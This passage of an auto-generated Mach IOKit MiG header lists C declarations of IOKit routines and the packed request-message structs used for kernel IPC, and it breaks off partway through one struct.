io_service_get_matching_service */ 1041 | #ifdef mig_external 1042 | mig_external 1043 | #else 1044 | extern 1045 | #endif /* mig_external */ 1046 | kern_return_t io_service_get_matching_service 1047 | ( 1048 | mach_port_t master_port, 1049 | io_string_t matching, 1050 | mach_port_t *service 1051 | ); 1052 | 1053 | /* Routine io_service_get_matching_service_ool */ 1054 | #ifdef mig_external 1055 | mig_external 1056 | #else 1057 | extern 1058 | #endif /* mig_external */ 1059 | kern_return_t io_service_get_matching_service_ool 1060 | ( 1061 | mach_port_t master_port, 1062 | io_buf_ptr_t matching, 1063 | mach_msg_type_number_t matchingCnt, 1064 | kern_return_t *result, 1065 | mach_port_t *service 1066 | ); 1067 | 1068 | /* Routine io_service_get_authorization_id */ 1069 | #ifdef mig_external 1070 | mig_external 1071 | #else 1072 | extern 1073 | #endif /* mig_external */ 1074 | kern_return_t io_service_get_authorization_id 1075 | ( 1076 | mach_port_t service, 1077 | uint64_t *authorization_id 1078 | ); 1079 | 1080 | /* Routine io_service_set_authorization_id */ 1081 | #ifdef mig_external 1082 | mig_external 1083 | #else 1084 | extern 1085 | #endif /* mig_external */ 1086 | kern_return_t io_service_set_authorization_id 1087 | ( 1088 | mach_port_t service, 1089 | uint64_t authorization_id 1090 | ); 1091 | 1092 | /* Routine io_server_version */ 1093 | #ifdef mig_external 1094 | mig_external 1095 | #else 1096 | extern 1097 | #endif /* mig_external */ 1098 | kern_return_t io_server_version 1099 | ( 1100 | mach_port_t master_port, 1101 | uint64_t *version 1102 | ); 1103 | 1104 | /* Routine io_registry_entry_get_properties_bin */ 1105 | #ifdef mig_external 1106 | mig_external 1107 | #else 1108 | extern 1109 | #endif /* mig_external */ 1110 | kern_return_t io_registry_entry_get_properties_bin 1111 | ( 1112 | mach_port_t registry_entry, 1113 | io_buf_ptr_t *properties, 1114 | mach_msg_type_number_t *propertiesCnt 1115 | ); 1116 | 1117 | /* Routine io_registry_entry_get_property_bin */ 1118 | #ifdef mig_external 1119 | mig_external 1120 | #else 1121 | extern 1122 | #endif /* mig_external */ 1123 | kern_return_t io_registry_entry_get_property_bin 1124 | ( 1125 | mach_port_t registry_entry, 1126 | io_name_t plane, 1127 | io_name_t property_name, 1128 | uint32_t options, 1129 | io_buf_ptr_t *properties, 1130 | mach_msg_type_number_t *propertiesCnt 1131 | ); 1132 | 1133 | /* Routine io_service_get_matching_service_bin */ 1134 | #ifdef mig_external 1135 | mig_external 1136 | #else 1137 | extern 1138 | #endif /* mig_external */ 1139 | kern_return_t io_service_get_matching_service_bin 1140 | ( 1141 | mach_port_t master_port, 1142 | io_struct_inband_t matching, 1143 | mach_msg_type_number_t matchingCnt, 1144 | mach_port_t *service 1145 | ); 1146 | 1147 | /* Routine io_service_get_matching_services_bin */ 1148 | #ifdef mig_external 1149 | mig_external 1150 | #else 1151 | extern 1152 | #endif /* mig_external */ 1153 | kern_return_t io_service_get_matching_services_bin 1154 | ( 1155 | mach_port_t master_port, 1156 | io_struct_inband_t matching, 1157 | mach_msg_type_number_t matchingCnt, 1158 | mach_port_t *existing 1159 | ); 1160 | 1161 | /* Routine io_service_match_property_table_bin */ 1162 | #ifdef mig_external 1163 | mig_external 1164 | #else 1165 | extern 1166 | #endif /* mig_external */ 1167 | kern_return_t io_service_match_property_table_bin 1168 | ( 1169 | mach_port_t service, 1170 | io_struct_inband_t matching, 1171 | mach_msg_type_number_t matchingCnt, 1172 | boolean_t *matches 1173 | ); 1174 | 1175 | /* Routine io_service_add_notification_bin */ 1176 | #ifdef mig_external 1177 | mig_external 1178 | #else 1179 | extern 1180 | #endif /* mig_external */ 1181 | kern_return_t io_service_add_notification_bin 1182 | ( 1183 | mach_port_t master_port, 1184 | io_name_t notification_type, 1185 | io_struct_inband_t matching, 1186 | mach_msg_type_number_t matchingCnt, 1187 | mach_port_t wake_port, 1188 | io_async_ref_t reference, 1189 | mach_msg_type_number_t referenceCnt, 1190 | mach_port_t *notification 1191 | ); 1192 | 1193 | /* Routine io_registry_entry_get_path_ool */ 1194 | #ifdef mig_external 1195 | mig_external 1196 | #else 1197 | extern 1198 | #endif /* mig_external */ 1199 | kern_return_t io_registry_entry_get_path_ool 1200 | ( 1201 | mach_port_t registry_entry, 1202 | io_name_t plane, 1203 | io_string_inband_t path, 1204 | io_buf_ptr_t *path_ool, 1205 | mach_msg_type_number_t *path_oolCnt 1206 | ); 1207 | 1208 | /* Routine io_registry_entry_from_path_ool */ 1209 | #ifdef mig_external 1210 | mig_external 1211 | #else 1212 | extern 1213 | #endif /* mig_external */ 1214 | kern_return_t io_registry_entry_from_path_ool 1215 | ( 1216 | mach_port_t master_port, 1217 | io_string_inband_t path, 1218 | io_buf_ptr_t path_ool, 1219 | mach_msg_type_number_t path_oolCnt, 1220 | kern_return_t *result, 1221 | mach_port_t *registry_entry 1222 | ); 1223 | 1224 | __END_DECLS 1225 | 1226 | /********************** Caution **************************/ 1227 | /* The following data types should be used to calculate */ 1228 | /* maximum message sizes only. The actual message may be */ 1229 | /* smaller, and the position of the arguments within the */ 1230 | /* message layout may vary from what is presented here. */ 1231 | /* For example, if any of the arguments are variable- */ 1232 | /* sized, and less than the maximum is sent, the data */ 1233 | /* will be packed tight in the actual message to reduce */ 1234 | /* the presence of holes. */ 1235 | /********************** Caution **************************/ 1236 | 1237 | /* typedefs for all requests */ 1238 | 1239 | #ifndef __Request__iokit_subsystem__defined 1240 | #define __Request__iokit_subsystem__defined 1241 | 1242 | #ifdef __MigPackStructs 1243 | #pragma pack(4) 1244 | #endif 1245 | typedef struct { 1246 | mach_msg_header_t Head; 1247 | } __Request__io_object_get_class_t; 1248 | #ifdef __MigPackStructs 1249 | #pragma pack() 1250 | #endif 1251 | 1252 | #ifdef __MigPackStructs 1253 | #pragma pack(4) 1254 | #endif 1255 | typedef struct { 1256 | mach_msg_header_t Head; 1257 | NDR_record_t NDR; 1258 | mach_msg_type_number_t classNameOffset; /* MiG doesn't use it */ 1259 | mach_msg_type_number_t classNameCnt; 1260 | char className[128]; 1261 | } __Request__io_object_conforms_to_t; 1262 | #ifdef __MigPackStructs 1263 | #pragma pack() 1264 | #endif 1265 | 1266 | #ifdef __MigPackStructs 1267 | #pragma pack(4) 1268 | #endif 1269 | typedef struct { 1270 | mach_msg_header_t Head; 1271 | } __Request__io_iterator_next_t; 1272 | #ifdef __MigPackStructs 1273 | #pragma pack() 1274 | #endif 1275 | 1276 | #ifdef __MigPackStructs 1277 | #pragma pack(4) 1278 | #endif 1279 | typedef struct { 1280 | mach_msg_header_t Head; 1281 | } __Request__io_iterator_reset_t; 1282 | #ifdef __MigPackStructs 1283 | #pragma pack() 1284 | #endif 1285 | 1286 | #ifdef __MigPackStructs 1287 | #pragma pack(4) 1288 | #endif 1289 | typedef struct { 1290 | mach_msg_header_t Head; 1291 | NDR_record_t NDR; 1292 | mach_msg_type_number_t matchingOffset; /* MiG doesn't use it */ 1293 | mach_msg_type_number_t matchingCnt; 1294 | char matching[512]; 1295 | } __Request__io_service_get_matching_services_t; 1296 | #ifdef __MigPackStructs 1297 | #pragma pack() 1298 | #endif 1299 | 1300 | #ifdef __MigPackStructs 1301 | #pragma pack(4) 1302 | #endif 1303 | typedef struct { 1304 | mach_msg_header_t Head; 1305 | NDR_record_t NDR; 1306 | mach_msg_type_number_t property_nameOffset; /* MiG doesn't use it */ 1307 | mach_msg_type_number_t property_nameCnt; 1308 | char property_name[128]; 1309 | } __Request__io_registry_entry_get_property_t; 1310 | #ifdef __MigPackStructs 1311 | #pragma pack() 1312 | #endif 1313 | 1314 | #ifdef __MigPackStructs 1315 | #pragma pack(4) 1316 | #endif 1317 | typedef struct { 1318 | mach_msg_header_t Head; 1319 | NDR_record_t NDR; 1320 | mach_msg_type_number_t planeOffset; /* MiG doesn't use it */ 1321 | mach_msg_type_number_t planeCnt; 1322 | char plane[128]; 1323 | uint32_t options; 1324 | } __Request__io_registry_create_iterator_t; 1325 | #ifdef __MigPackStructs 1326 | #pragma pack() 1327 | #endif 1328 | 1329 | #ifdef __MigPackStructs 1330 | #pragma pack(4) 1331 | #endif 1332 | typedef struct { 1333 | mach_msg_header_t Head; 1334 | } __Request__io_registry_iterator_enter_entry_t; 1335 | #ifdef __MigPackStructs 1336 | #pragma pack() 1337 | #endif 1338 | 1339 | #ifdef __MigPackStructs 1340 | #pragma pack(4) 1341 | #endif 1342 | typedef struct { 1343 | mach_msg_header_t Head; 1344 | } __Request__io_registry_iterator_exit_entry_t; 1345 | #ifdef __MigPackStructs 1346 | #pragma pack() 1347 | #endif 1348 | 1349 | #ifdef __MigPackStructs 1350 | #pragma pack(4) 1351 | #endif 1352 | typedef struct { 1353 | mach_msg_header_t Head; 1354 | NDR_record_t NDR; 1355 | mach_msg_type_number_t pathOffset; /* MiG doesn't use it */ 1356 | mach_msg_type_number_t pathCnt; 1357 | char path[512]; 1358 | } __Request__io_registry_entry_from_path_t; 1359 | #ifdef __MigPackStructs 1360 | #pragma pack() 1361 | #endif 1362 | 1363 | #ifdef __MigPackStructs 1364 | #pragma pack(4) 1365 | #endif 1366 | typedef struct { 1367 | mach_msg_header_t Head; 1368 | } __Request__io_registry_entry_get_name_t; 1369 | #ifdef __MigPackStructs 1370 | #pragma pack() 1371 | #endif 1372 | 1373 | #ifdef __MigPackStructs 1374 | #pragma pack(4) 1375 | #endif 1376 | typedef struct { 1377 | mach_msg_header_t Head; 1378 | } __Request__io_registry_entry_get_properties_t; 1379 | #ifdef __MigPackStructs 1380 | #pragma pack() 1381 | #endif 1382 | 1383 | #ifdef __MigPackStructs 1384 | #pragma pack(4) 1385 | #endif 1386 | typedef struct { 1387 | mach_msg_header_t Head; 1388 | NDR_record_t NDR; 1389 | mach_msg_type_number_t property_nameOffset; /* MiG doesn't use it */ 1390 | mach_msg_type_number_t property_nameCnt; 1391 | char property_name[128]; 1392 | mach_msg_type_number_t dataCnt; 1393 | } __Request__io_registry_entry_get_property_bytes_t; 1394 | #ifdef __MigPackStructs 1395 | #pragma pack() 1396 | #endif 1397 | 1398 | #ifdef __MigPackStructs 1399 | #pragma pack(4) 1400 | #endif 1401 | typedef struct { 1402 | mach_msg_header_t Head; 1403 | NDR_record_t NDR; 1404 | mach_msg_type_number_t planeOffset; /* MiG doesn't use it */ 1405 | mach_msg_type_number_t planeCnt; 1406 | char plane[128]; 1407 | } __Request__io_registry_entry_get_child_iterator_t; 1408 | #ifdef __MigPackStructs 1409 | #pragma pack() 1410 | #endif 1411 | 1412 | #ifdef __MigPackStructs 1413 | #pragma pack(4) 1414 | #endif 1415 | typedef struct { 1416 | mach_msg_header_t Head; 1417 | NDR_record_t NDR; 1418 | mach_msg_type_number_t planeOffset; /* MiG doesn't use it */ 1419 | mach_msg_type_number_t planeCnt; 1420 | char plane[128]; 1421 | } __Request__io_registry_entry_get_parent_iterator_t; 1422 | #ifdef __MigPackStructs 1423 | #pragma pack() 1424 | #endif 1425 | 1426 | #ifdef __MigPackStructs 1427 | #pragma pack(4) 1428 | #endif 1429 | typedef struct { 1430 | mach_msg_header_t Head; 1431 | } __Request__io_service_close_t; 1432 | #ifdef __MigPackStructs 1433 | #pragma pack() 1434 | #endif 1435 | 1436 | #ifdef __MigPackStructs 1437 | #pragma pack(4) 1438 | #endif 1439 | typedef struct { 1440 | mach_msg_header_t Head; 1441 | } __Request__io_connect_get_service_t; 1442 | #ifdef __MigPackStructs 1443 | #pragma pack() 1444 | #endif 1445 | 1446 | #ifdef __MigPackStructs 1447 | #pragma pack(4) 1448 | #endif 1449 | typedef struct { 1450 | mach_msg_header_t Head; 1451 | /* start of the kernel processed data */ 1452 | mach_msg_body_t msgh_body; 1453 | mach_msg_port_descriptor_t port; 1454 | /* end of the kernel processed data */ 1455 | NDR_record_t NDR; 1456 | uint32_t notification_type; 1457 | uint32_t reference; 1458 | } __Request__io_connect_set_notification_port_t; 1459 | #ifdef __MigPackStructs 1460 | #pragma pack() 1461 | #endif 1462 | 1463 | #ifdef __MigPackStructs 1464 | #pragma pack(4) 1465 | #endif 1466 | typedef struct { 1467 | mach_msg_header_t Head; 1468 | /* start of the kernel processed data */ 1469 | mach_msg_body_t msgh_body; 1470 | mach_msg_port_descriptor_t into_task; 1471 | /* end of the kernel processed data */ 1472 | NDR_record_t NDR; 1473 | uint32_t memory_type; 1474 | vm_address_t address; 1475 | vm_size_t size; 1476 | uint32_t flags; 1477 | } __Request__io_connect_map_memory_t; 1478 | #ifdef __MigPackStructs 1479 | #pragma pack() 1480 | #endif 1481 | 1482 | #ifdef __MigPackStructs 1483 | #pragma pack(4) 1484 | #endif 1485 | typedef struct { 1486 | mach_msg_header_t Head; 1487 | /* start of the kernel processed data */ 1488 | mach_msg_body_t msgh_body; 1489 | mach_msg_port_descriptor_t connect_to; 1490 | /* end of the kernel processed data */ 1491 | } __Request__io_connect_add_client_t; 1492 | #ifdef __MigPackStructs 1493 | #pragma pack() 1494 | #endif 1495 | 1496 | #ifdef __MigPackStructs 1497 | #pragma pack(4) 1498 | #endif 1499 | typedef struct { 1500 | mach_msg_header_t Head; 1501 | /* start of the kernel processed data */ 1502 | mach_msg_body_t msgh_body; 1503 | mach_msg_ool_descriptor_t properties; 1504 | /* end of the kernel processed data */ 1505 | NDR_record_t NDR; 1506 | mach_msg_type_number_t propertiesCnt; 1507 | } __Request__io_connect_set_properties_t; 1508 | #ifdef __MigPackStructs 1509 | #pragma pack() 1510 | #endif 1511 | 1512 | #ifdef __MigPackStructs 1513 | #pragma pack(4) 1514 | #endif 1515 | typedef struct { 1516 | mach_msg_header_t Head; 1517 | NDR_record_t NDR; 1518 | uint32_t selector; 1519 | mach_msg_type_number_t inputCnt; 1520 | io_user_scalar_t input[16]; 1521 | mach_msg_type_number_t outputCnt; 1522 | } __Request__io_connect_method_scalarI_scalarO_t; 1523 | #ifdef __MigPackStructs 1524 | #pragma pack() 1525 | #endif 1526 | 1527 | #ifdef __MigPackStructs 1528 | #pragma pack(4) 1529 | #endif 1530 | typedef struct { 1531 | mach_msg_header_t Head; 1532 | NDR_record_t NDR; 1533 | uint32_t selector; 1534 | mach_msg_type_number_t inputCnt; 1535 | io_user_scalar_t input[16]; 1536 | mach_msg_type_number_t outputCnt; 1537 | } __Request__io_connect_method_scalarI_structureO_t; 1538 | #ifdef __MigPackStructs 1539 | #pragma pack() 1540 | #endif 1541 | 1542 | #ifdef __MigPackStructs 1543 | #pragma pack(4) 1544 | #endif 1545 | typedef struct { 1546 | mach_msg_header_t Head; 1547 | NDR_record_t NDR; 1548 | uint32_t selector; 1549 | mach_msg_type_number_t inputCnt; 1550 | io_user_scalar_t input[16]; 1551 | mach_msg_type_number_t inputStructCnt; 1552 | char inputStruct[4096]; 1553 | } __Request__io_connect_method_scalarI_structureI_t; 1554 | #ifdef __MigPackStructs 1555 | #pragma pack() 1556 | #endif 1557 | 1558 | #ifdef __MigPackStructs 1559 | #pragma pack(4) 1560 | #endif 1561 | typedef struct { 1562 | mach_msg_header_t Head; 1563 | NDR_record_t NDR; 1564 | uint32_t selector; 1565 | mach_msg_type_number_t inputCnt; 1566 | char input[4096]; 1567 | mach_msg_type_number_t outputCnt; 1568 | } __Request__io_connect_method_structureI_structureO_t; 1569 | #ifdef __MigPackStructs 1570 | #pragma pack() 1571 | #endif 1572 | 1573 | #ifdef __MigPackStructs 1574 | #pragma pack(4) 1575 | #endif 1576 | typedef struct { 1577 | mach_msg_header_t Head; 1578 | NDR_record_t NDR; 1579 | mach_msg_type_number_t planeOffset; /* MiG doesn't use it */ 1580 | mach_msg_type_number_t planeCnt; 1581 | char plane[128]; 1582 | } __Request__io_registry_entry_get_path_t; 1583 | #ifdef __MigPackStructs 1584 | #pragma pack() 1585 | #endif 1586 | 1587 | #ifdef __MigPackStructs 1588 | #pragma pack(4) 1589 | #endif 1590 | typedef struct { 1591 | mach_msg_header_t Head; 1592 | } __Request__io_registry_get_root_entry_t; 1593 | #ifdef __MigPackStructs 1594 | #pragma pack() 1595 | #endif 1596 | 1597 | #ifdef __MigPackStructs 1598 | #pragma pack(4) 1599 | #endif 1600 | typedef struct { 1601 | mach_msg_header_t Head; 1602 | /* start of the kernel processed data */ 1603 | mach_msg_body_t msgh_body; 1604 | mach_msg_ool_descriptor_t properties; 1605 | /* end of the kernel processed data */ 1606 | NDR_record_t NDR; 1607 | mach_msg_type_number_t propertiesCnt; 1608 | } __Request__io_registry_entry_set_properties_t; 1609 | #ifdef __MigPackStructs 1610 | #pragma pack() 1611 | #endif 1612 | 1613 | #ifdef __MigPackStructs 1614 | #pragma pack(4) 1615 | #endif 1616 | typedef struct { 1617 | mach_msg_header_t Head; 1618 | NDR_record_t NDR; 1619 | mach_msg_type_number_t planeOffset; /* MiG doesn't use it */ 1620 | mach_msg_type_number_t planeCnt; 1621 | char plane[128]; 1622 | } __Request__io_registry_entry_in_plane_t; 1623 | #ifdef __MigPackStructs 1624 | #pragma pack() 1625 | #endif 1626 | 1627 | #ifdef __MigPackStructs 1628 | #pragma pack(4) 1629 | #endif 1630 | typedef struct { 1631 | mach_msg_header_t Head; 1632 | } __Request__io_object_get_retain_count_t; 1633 | #ifdef __MigPackStructs 1634 | #pragma pack() 1635 | #endif 1636 | 1637 | #ifdef __MigPackStructs 1638 | #pragma pack(4) 1639 | #endif 1640 | typedef struct { 1641 | mach_msg_header_t Head; 1642 | } __Request__io_service_get_busy_state_t; 1643 | #ifdef __MigPackStructs 1644 | #pragma pack() 1645 | #endif 1646 | 1647 | #ifdef __MigPackStructs 1648 | #pragma pack(4) 1649 | #endif 1650 | typedef struct { 1651 | mach_msg_header_t Head; 1652 | NDR_record_t NDR; 1653 | mach_timespec_t wait_time; 1654 | } __Request__io_service_wait_quiet_t; 1655 | #ifdef __MigPackStructs 1656 | #pragma pack() 1657 | #endif 1658 | 1659 | #ifdef __MigPackStructs 1660 | #pragma pack(4) 1661 | #endif 1662 | typedef struct { 1663 | mach_msg_header_t Head; 1664 | NDR_record_t NDR; 1665 | mach_msg_type_number_t planeOffset; /* MiG doesn't use it */ 1666 | mach_msg_type_number_t planeCnt; 1667 | char plane[128]; 1668 | uint32_t options; 1669 | } __Request__io_registry_entry_create_iterator_t; 1670 | #ifdef __MigPackStructs 1671 | #pragma pack() 1672 | #endif 1673 | 1674 | #ifdef __MigPackStructs 1675 | #pragma pack(4) 1676 | #endif 1677 | typedef struct { 1678 | mach_msg_header_t Head; 1679 | } __Request__io_iterator_is_valid_t; 1680 | #ifdef __MigPackStructs 1681 | #pragma pack() 1682 | #endif 1683 | 1684 | #ifdef __MigPackStructs 1685 | #pragma pack(4) 1686 | #endif 1687 | typedef struct { 1688 | mach_msg_header_t Head; 1689 | /* start of the kernel processed data */ 1690 | mach_msg_body_t msgh_body; 1691 | mach_msg_ool_descriptor_t inData; 1692 | /* end of the kernel processed data */ 1693 | NDR_record_t NDR; 1694 | uint32_t flag; 1695 | mach_msg_type_number_t inDataCnt; 1696 | } __Request__io_catalog_send_data_t; 1697 | #ifdef __MigPackStructs 1698 | #pragma pack() 1699 | #endif 1700 | 1701 | #ifdef __MigPackStructs 1702 | #pragma pack(4) 1703 | #endif 1704 | typedef struct { 1705 | mach_msg_header_t Head; 1706 | NDR_record_t NDR; 1707 | uint32_t flag; 1708 | mach_msg_type_number_t nameOffset; /* MiG doesn't use it */ 1709 | mach_msg_type_number_t nameCnt; 1710 | char name[128]; 1711 | } __Request__io_catalog_terminate_t; 1712 | #ifdef __MigPackStructs 1713 | #pragma pack() 1714 | #endif 1715 | 1716 | #ifdef __MigPackStructs 1717 | #pragma pack(4) 1718 | #endif 1719 | typedef struct { 1720 | mach_msg_header_t Head; 1721 | NDR_record_t NDR; 1722 | uint32_t flag; 1723 | } __Request__io_catalog_get_data_t; 1724 | #ifdef __MigPackStructs 1725 | #pragma pack() 1726 | #endif 1727 | 1728 | #ifdef __MigPackStructs 1729 | #pragma pack(4) 1730 | #endif 1731 | typedef struct { 1732 | mach_msg_header_t Head; 1733 | } __Request__io_catalog_get_gen_count_t; 1734 | #ifdef __MigPackStructs 1735 | #pragma pack() 1736 | #endif 1737 | 1738 | #ifdef __MigPackStructs 1739 | #pragma pack(4) 1740 | #endif 1741 | typedef struct { 1742 | mach_msg_header_t Head; 1743 | NDR_record_t NDR; 1744 | mach_msg_type_number_t nameOffset; /* MiG doesn't use it */ 1745 | mach_msg_type_number_t nameCnt; 1746 | char name[128]; 1747 | } __Request__io_catalog_module_loaded_t; 1748 | #ifdef __MigPackStructs 1749 | #pragma pack() 1750 | #endif 1751 | 1752 | #ifdef __MigPackStructs 1753 | #pragma pack(4) 1754 | #endif 1755 | typedef struct { 1756 | mach_msg_header_t Head; 1757 | NDR_record_t NDR; 1758 | uint32_t flag; 1759 | } __Request__io_catalog_reset_t; 1760 | #ifdef __MigPackStructs 1761 | #pragma pack() 1762 | #endif 1763 | 1764 | #ifdef __MigPackStructs 1765 | #pragma pack(4) 1766 | #endif 1767 | typedef struct { 1768 | mach_msg_header_t Head; 1769 | NDR_record_t NDR; 1770 | uint32_t options; 1771 | } __Request__io_service_request_probe_t; 1772 | #ifdef __MigPackStructs 1773 | #pragma pack() 1774 | #endif 1775 | 1776 | #ifdef __MigPackStructs 1777 | #pragma pack(4) 1778 | #endif 1779 | typedef struct { 1780 | mach_msg_header_t Head; 1781 | NDR_record_t NDR; 1782 | mach_msg_type_number_t planeOffset; /* MiG doesn't use it */ 1783 | mach_msg_type_number_t planeCnt; 1784 | char plane[128]; 1785 | } __Request__io_registry_entry_get_name_in_plane_t; 1786 | #ifdef __MigPackStructs 1787 | #pragma pack() 1788 | #endif 1789 | 1790 | #ifdef __MigPackStructs 1791 | #pragma pack(4) 1792 | #endif 1793 | typedef struct { 1794 | mach_msg_header_t Head; 1795 | NDR_record_t NDR; 1796 | mach_msg_type_number_t matchingOffset; /* MiG doesn't use it */ 1797 | mach_msg_type_number_t matchingCnt; 1798 | char matching[512]; 1799 | } __Request__io_service_match_property_table_t; 1800 | #ifdef __MigPackStructs 1801 | #pragma pack() 1802 | #endif 1803 | 1804 | #ifdef __MigPackStructs 1805 | #pragma pack(4) 1806 | #endif 1807 | typedef struct { 1808 | mach_msg_header_t Head; 1809 | /* start of the kernel processed data */ 1810 | mach_msg_body_t msgh_body; 1811 | mach_msg_port_descriptor_t wake_port; 1812 | /* end of the kernel processed data */ 1813 | NDR_record_t NDR; 1814 | mach_msg_type_number_t referenceCnt; 1815 | io_user_reference_t reference[8]; 1816 | uint32_t selector; 1817 | mach_msg_type_number_t inputCnt; 1818 | io_user_scalar_t input[16]; 1819 | mach_msg_type_number_t outputCnt; 1820 | } __Request__io_async_method_scalarI_scalarO_t; 1821 | #ifdef __MigPackStructs 1822 | #pragma pack() 1823 | #endif 1824 | 1825 | #ifdef __MigPackStructs 1826 | #pragma pack(4) 1827 | #endif 1828 | typedef struct { 1829 | mach_msg_header_t Head; 1830 | /* start of the kernel processed data */ 1831 | mach_msg_body_t msgh_body; 1832 | mach_msg_port_descriptor_t wake_port; 1833 | /* end of the kernel processed data */ 1834 | NDR_record_t NDR; 1835 | mach_msg_type_number_t referenceCnt; 1836 | io_user_reference_t reference[8]; 1837 | uint32_t selector; 1838 | mach_msg_type_number_t inputCnt; 1839 | io_user_scalar_t input[16]; 1840 | mach_msg_type_number_t outputCnt; 1841 | } __Request__io_async_method_scalarI_structureO_t; 1842 | #ifdef __MigPackStructs 1843 | #pragma pack() 1844 | #endif 1845 | 1846 | #ifdef __MigPackStructs 1847 | #pragma pack(4) 1848 | #endif 1849 | typedef struct { 1850 | mach_msg_header_t Head; 1851 | /* start of the kernel processed data */ 1852 | mach_msg_body_t msgh_body; 1853 | mach_msg_port_descriptor_t wake_port; 1854 | /* end of the kernel processed data */ 1855 | NDR_record_t NDR; 1856 | mach_msg_type_number_t referenceCnt; 1857 | io_user_reference_t reference[8]; 1858 | uint32_t selector; 1859 | mach_msg_type_number_t inputCnt; 1860 | io_user_scalar_t input[16]; 1861 | mach_msg_type_number_t inputStructCnt; 1862 | char inputStruct[4096]; 1863 | } __Request__io_async_method_scalarI_structureI_t; 1864 | #ifdef __MigPackStructs 1865 | #pragma pack() 1866 | #endif 1867 | 1868 | #ifdef __MigPackStructs 1869 | #pragma pack(4) 1870 | #endif 1871 | typedef struct { 1872 | mach_msg_header_t Head; 1873 | /* start of the kernel processed data */ 1874 | mach_msg_body_t msgh_body; 1875 | mach_msg_port_descriptor_t wake_port; 1876 | /* end of the kernel processed data */ 1877 | NDR_record_t NDR; 1878 | mach_msg_type_number_t referenceCnt; 1879 | io_user_reference_t reference[8]; 1880 | uint32_t selector; 1881 | mach_msg_type_number_t inputCnt; 1882 | char input[4096]; 1883 | mach_msg_type_number_t outputCnt; 1884 | } __Request__io_async_method_structureI_structureO_t; 1885 | #ifdef __MigPackStructs 1886 | #pragma pack() 1887 | #endif 1888 | 1889 | #ifdef __MigPackStructs 1890 | #pragma pack(4) 1891 | #endif 1892 | typedef struct { 1893 | mach_msg_header_t Head; 1894 | /* start of the kernel processed data */ 1895 | mach_msg_body_t msgh_body; 1896 | mach_msg_port_descriptor_t wake_port; 1897 | /* end of the kernel processed data */ 1898 | NDR_record_t NDR; 1899 | mach_msg_type_number_t notification_typeOffset; /* MiG doesn't use it */ 1900 | mach_msg_type_number_t notification_typeCnt; 1901 | char notification_type[128]; 1902 | mach_msg_type_number_t matchingOffset; /* MiG doesn't use it */ 1903 | mach_msg_type_number_t matchingCnt; 1904 | char matching[512]; 1905 | mach_msg_type_number_t referenceCnt; 1906 | io_user_reference_t reference[8]; 1907 | } __Request__io_service_add_notification_t; 1908 | #ifdef __MigPackStructs 1909 | #pragma pack() 1910 | #endif 1911 | 1912 | #ifdef __MigPackStructs 1913 | #pragma pack(4) 1914 | #endif 1915 | typedef struct { 1916 | mach_msg_header_t Head; 1917 | /* start of the kernel processed data */ 1918 | mach_msg_body_t msgh_body; 1919 | mach_msg_port_descriptor_t wake_port; 1920 | /* end of the kernel processed data */ 1921 | NDR_record_t NDR; 1922 | mach_msg_type_number_t type_of_interestOffset; /* MiG doesn't use it */ 1923 | mach_msg_type_number_t type_of_interestCnt; 1924 | char type_of_interest[128]; 1925 | mach_msg_type_number_t referenceCnt; 1926 | io_user_reference_t reference[8]; 1927 | } __Request__io_service_add_interest_notification_t; 1928 | #ifdef __MigPackStructs 1929 | #pragma pack() 1930 | #endif 1931 | 1932 | #ifdef __MigPackStructs 1933 | #pragma pack(4) 1934 | #endif 1935 | typedef struct { 1936 | mach_msg_header_t Head; 1937 | NDR_record_t NDR; 1938 | natural_t notify_ref; 1939 | natural_t response; 1940 | } __Request__io_service_acknowledge_notification_t; 1941 | #ifdef __MigPackStructs 1942 | #pragma pack() 1943 | #endif 1944 | 1945 | #ifdef __MigPackStructs 1946 | #pragma pack(4) 1947 | #endif 1948 | typedef struct { 1949 | mach_msg_header_t Head; 1950 | NDR_record_t NDR; 1951 | natural_t notification_type; 1952 | } __Request__io_connect_get_notification_semaphore_t; 1953 | #ifdef __MigPackStructs 1954 | #pragma pack() 1955 | #endif 1956 | 1957 | #ifdef __MigPackStructs 1958 | #pragma pack(4) 1959 | #endif 1960 | typedef struct { 1961 | mach_msg_header_t Head; 1962 | /* start of the kernel processed data */ 1963 | mach_msg_body_t msgh_body; 1964 | mach_msg_port_descriptor_t into_task; 1965 | /* end of the kernel processed data */ 1966 | NDR_record_t NDR; 1967 | uint32_t memory_type; 1968 | vm_address_t address; 1969 | } __Request__io_connect_unmap_memory_t; 1970 | #ifdef __MigPackStructs 1971 | #pragma pack() 1972 | #endif 1973 | 1974 | #ifdef __MigPackStructs 1975 | #pragma pack(4) 1976 | #endif 1977 | typedef struct { 1978 | mach_msg_header_t Head; 1979 | NDR_record_t NDR; 1980 | mach_msg_type_number_t planeOffset; /* MiG doesn't use it */ 1981 | mach_msg_type_number_t planeCnt; 1982 | char plane[128]; 1983 | } __Request__io_registry_entry_get_location_in_plane_t; 1984 | #ifdef __MigPackStructs 1985 | #pragma pack() 1986 | #endif 1987 | 1988 | #ifdef __MigPackStructs 1989 | #pragma pack(4) 1990 | #endif 1991 | typedef struct { 1992 | mach_msg_header_t Head; 1993 | NDR_record_t NDR; 1994 | mach_msg_type_number_t planeOffset; /* MiG doesn't use it */ 1995 | mach_msg_type_number_t planeCnt; 1996 | char plane[128]; 1997 | mach_msg_type_number_t property_nameOffset; /* MiG doesn't use it */ 1998 | mach_msg_type_number_t property_nameCnt; 1999 | char property_name[128]; 2000 | uint32_t options; 2001 | } __Request__io_registry_entry_get_property_recursively_t; 2002 | #ifdef __MigPackStructs 2003 | #pragma pack() 2004 | #endif 2005 | 2006 | #ifdef __MigPackStructs 2007 | #pragma pack(4) 2008 | #endif 2009 | typedef struct { 2010 | mach_msg_header_t Head; 2011 | } __Request__io_service_get_state_t; 2012 | #ifdef __MigPackStructs 2013 | #pragma pack() 2014 | #endif 2015 | 2016 | #ifdef __MigPackStructs 2017 | #pragma pack(4) 2018 | #endif 2019 | typedef struct { 2020 | mach_msg_header_t Head; 2021 | /* start of the kernel processed data */ 2022 | mach_msg_body_t msgh_body; 2023 | mach_msg_ool_descriptor_t matching; 2024 | /* end of the kernel processed data */ 2025 | NDR_record_t NDR; 2026 | mach_msg_type_number_t matchingCnt; 2027 | } __Request__io_service_get_matching_services_ool_t; 2028 | #ifdef __MigPackStructs 2029 | #pragma pack() 2030 | #endif 2031 | 2032 | #ifdef __MigPackStructs 2033 | #pragma pack(4) 2034 | #endif 2035 | typedef struct { 2036 | mach_msg_header_t Head; 2037 | /* start of the kernel processed data */ 2038 | mach_msg_body_t msgh_body; 2039 | mach_msg_ool_descriptor_t matching; 2040 | /* end of the kernel processed data */ 2041 | NDR_record_t NDR; 2042 | 